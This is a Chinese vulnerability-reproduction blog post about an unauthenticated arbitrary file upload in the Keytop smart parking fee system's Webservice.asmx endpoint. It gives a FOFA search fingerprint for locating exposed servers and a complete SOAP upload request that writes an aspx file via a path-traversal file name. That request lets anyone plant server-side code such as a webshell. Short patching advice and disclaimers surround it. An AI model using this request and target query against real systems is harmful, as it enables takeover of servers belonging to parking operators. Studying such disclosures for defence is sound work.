漏洞复现 | 科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞【附poc】

admin 2024年5月29日14:26:25评论139 views字数 1292阅读4分18秒阅读模式

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!

一、漏洞简述

科拓全智能停车收费系统是一套先进的停车场管理系统,它集成了计算机、网络设备、车道管理设备等多种技术,旨在实现对停车场车辆出入、场内车流引导、以及停车费收取的智能化管理。Webservice.asmx接口存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传任意文件,进而控制服务器系统

漏洞复现 | 科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞【附poc】

二、网络测绘

fofa:body="/KT_Css/qd_defaul.css"

漏洞复现 | 科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞【附poc】

三、漏洞复现

测试上传aspx文件,文件内容需要base64编码

漏洞复现 | 科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞【附poc】

访问test.aspx文件

漏洞复现 | 科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞【附poc】

四、漏洞检测poc

POST /Webservice.asmx HTTP/1.1Host: 0.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36Connection: closeContent-Length: 419Content-Type: text/xmlAccept-Encoding: gzip<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><UploadResume xmlns="http://tempuri.org/"><ip>1</ip><fileName>../../../../test.aspx</fileName><fileFlow>dGVzdA==</fileFlow><tag>3</tag></UploadResume></soap:Body></soap:Envelope>

五、漏洞修复

1、建议联系厂商打补丁或升级版本。

2、增加Web应用防火墙防护。

3、关闭互联网暴露面或接口设置访问权限。

免责声明

本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!

原文始发于微信公众号(实战安全研究):漏洞复现 | 科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞【附poc】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月29日14:26:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | 科拓全智能停车收费系统 Webservice.asmx 任意文件上传漏洞【附poc】https://cn-sec.com/archives/2790980.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息